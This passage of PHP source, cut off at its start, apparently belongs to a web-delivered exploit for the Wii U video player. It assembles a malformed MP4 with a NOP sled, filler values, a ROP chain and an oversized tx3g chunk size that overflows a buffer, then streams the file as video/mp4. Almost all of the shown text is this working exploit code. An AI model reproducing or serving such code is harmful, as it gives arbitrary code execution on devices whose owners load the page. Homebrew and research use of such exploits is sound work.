= 0x6000) { header("HTTP/1.1 500 Internal Server Error"); die("The payload binary is too large.\n"); } while($i+4 < 0x5000) { $con.= pack("N*", 0x90909090); $i+= 4; } continue; } else { $writeval = 0x58585858; } } else if($i<$tx3g_ropchain_start) { $writeval = $ROP_POPJUMPLR_STACK12; } else if($i==$tx3g_ropchain_start) { $con.= pack("N*", $ROP_POPJUMPLR_STACK12); $con.= pack("N*", 0x48484848);//If LR ever gets loaded from here there's no known way to recover from that automatically, this code would need manually adjusted if that ever happens. Hopefully this doesn't ever happen. $i+= 0x8; $con.= $ROPCHAIN; $i+= strlen($ROPCHAIN)-4; if($i+4 > $first_tx3g_size-8) { header("HTTP/1.1 500 Internal Server Error"); $pos = ($i+4) - ($first_tx3g_size-8); die("The generated ROP-chain is $pos bytes too large.\n"); } continue; } else { $writeval = 0x48484848; } $con.= pack("N*", $writeval); } $con.= pack("N*", 0x1c5);//Setup the mdia chunk. $con.= pack("N*", 0x6d646961); $con.= pack("N*", 0x1);//Setup the second tx3g chunk: size+chunkid, followed by the actual chunk size in u64 form. $con.= pack("N*", 0x74783367); $con.= pack("N*", 0x1); $con.= pack("N*", 0x100000000-$first_tx3g_size);//Haxx buffer alloc size passed to the memalloc code is 0x100000000. for($i=0; $i<0x2000; $i+=4)//Old stuff, probably should be removed(testing is required for that). { $con.= pack("N*", 0x8495a6b4); } header('HTTP/1.0 200 OK'); header("Content-Type: video/mp4"); header('Accept-Ranges: bytes'); header('Content-Length: '.strlen($con)); header("Content-Transfer-Encoding: binary\n"); header('Connection: close'); // thanks to http://loadiine.ovh for finding this out // At this exact moment, WiiU is loading its video player according to "Content-Type: video/mp4" // When loaded too quickly, the video player can still freeze. So let's leave him 1 second to pop-up sleep(1); //echo $con; do { $sub = substr($con, 0, 1024*16); $con = substr($con, 1024*16); echo $sub; usleep(1000); $len = strlen($con); } while($len > 0); ?>